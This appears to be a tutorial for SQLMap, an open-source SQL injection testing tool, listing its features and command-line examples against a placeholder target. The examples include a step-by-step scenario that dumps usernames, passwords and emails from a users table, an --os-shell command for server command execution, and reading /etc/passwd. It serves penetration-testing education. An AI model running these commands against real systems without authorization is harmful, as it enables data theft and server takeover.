SQLMap is a free open-source penetration testing tool that automates the process of detecting and exploiting SQL injection vulnerabilities, as well as taking over database servers. This tool has a powerful detection engine, many specialized functions for penetration testing professionals, and a wide range of capabilities: from database identification to data extraction, file system access, and even executing operating system commands through out-of-band connections.
Main Features of SQLMap
- Support for numerous DBMS systems: Full support for MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase, SAP MaxDB, Informix, MariaDB, MemSQL, TiDB, CockroachDB, HSQLDB, H2, MonetDB, Apache Derby, Amazon Redshift, Vertica, Mckoi, Presto, Altibase, MimerSQL, CrateDB, Greenplum, Drizzle, Apache Ignite, Cubrid, InterSystems Cache, IRIS, eXtremeDB, FrontBase, Raima Database Manager, YugabyteDB, Aurora, OpenGauss, ClickHouse, and Virtuoso.
- SQL Injection Techniques: Support for six different SQL injection techniques:
- Boolean-based blind injections
- Time-based blind injections
- Error-based injections
- UNION query-based injections
- Stacked queries
- Out-of-band injections
- Additional Capabilities:
- Direct connection to databases without using SQL injections
- Enumeration of users, password hashes, privileges, roles, databases, tables, and columns
- Automatic recognition of password hash formats and cracking them using dictionary attacks
- Dumping table contents entirely or partial ranges of records
- Searching for specific databases, tables, or columns
- Downloading and uploading files from the server’s file system
- Executing arbitrary commands on the database server
- Creating out-of-band TCP connections between the attacking machine and the server
- Elevating privileges of the database process user
Downloading SQLMap
(NOTE!!! SQLMap is installed by default in Kali Linux. All commands listed below are used without “python”)
The best way to download SQLMap is to clone the Git repository:
git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev
Alternatively, you can download the latest version in zip or tar format from the official website.
Examples of Using SQLMap
Basic Commands
Basic URL checking for SQL injection vulnerabilities:
python sqlmap.py -u "http://target-website.com/page.php?id=1"
Testing a specific parameter:
python sqlmap.py -u "http://target-website.com/page.php?id=1" -p id
Using cookies:
python sqlmap.py -u "http://target-website.com/page.php" --cookie="PHPSESSID=abcdef123456"
HTTP Basic Authentication:
python sqlmap.py -u "http://target-website.com/page.php" --auth-type=basic --auth-cred="username:password"
Advanced Examples
Determining the database:
python sqlmap.py -u "http://target-website.com/page.php?id=1" --dbs
Enumerating tables of a specific database:
python sqlmap.py -u "http://target-website.com/page.php?id=1" -D database_name --tables
Enumerating columns of a specific table:
python sqlmap.py -u "http://target-website.com/page.php?id=1" -D database_name -T table_name --columns
Dumping data from a specific table:
python sqlmap.py -u "http://target-website.com/page.php?id=1" -D database_name -T table_name -C "column1,column2" --dump
Using time-delay technique:
python sqlmap.py -u "http://target-website.com/page.php?id=1" --technique=T
Executing operating system commands:
python sqlmap.py -u "http://target-website.com/page.php?id=1" --os-shell
Downloading a file from the server:
python sqlmap.py -u "http://target-website.com/page.php?id=1" --file-read=/etc/passwd
Uploading a file to the server:
python sqlmap.py -u "http://target-website.com/page.php?id=1" --file-write=local_file.txt --file-dest=/tmp/remote_file.txt
Example of a Complete Pentest Scenario
- Vulnerability detection:
python sqlmap.py -u "http://target-website.com/page.php?id=1" --batch
- Determining database version:
python sqlmap.py -u "http://target-website.com/page.php?id=1" --banner
- Enumerating all available databases:
python sqlmap.py -u "http://target-website.com/page.php?id=1" --dbs
- Enumerating tables in an interesting database:
python sqlmap.py -u "http://target-website.com/page.php?id=1" -D users_db --tables
- Enumerating columns in the users table:
python sqlmap.py -u "http://target-website.com/page.php?id=1" -D users_db -T users --columns
- Dumping user data:
python sqlmap.py -u "http://target-website.com/page.php?id=1" -D users_db -T users -C "username,password,email" --dump
Important SQLMap Parameters
-u, --url— URL to test-p— parameter to test--cookie— HTTP cookie to use--data— data to send in a POST request--dbs— enumerate databases--tables— enumerate tables--columns— enumerate columns--dump— dump data--batch— run in non-interactive mode--technique— SQL injection techniques to use--time-sec— seconds of delay for time-based attacks--threads— number of threads (for acceleration)--proxy— use a proxy--level— testing level (1-5, default 1)--risk— risk level (1-3, default 1)
Conclusion
SQLMap is an indispensable tool for penetration testers and web application security specialists. It allows automating the process of detecting and exploiting SQL injection vulnerabilities, which significantly improves the efficiency of web application security testing.
Disclaimer and Legal Information
SQLMap is free software distributed under the GNU General Public License v2.0. Using SQLMap to attack targets without prior mutual consent is illegal. It is the end user’s responsibility to comply with all applicable local, state, and federal laws. The developers are not liable for any misuse or damage caused by this program.
Remember: This tool should be used exclusively for legitimate penetration testing and security assessment with proper authorization.
- Similar resources – https://sqlmap.org/
- Similar resources – https://itorakul.com.ua/ethical-hacking
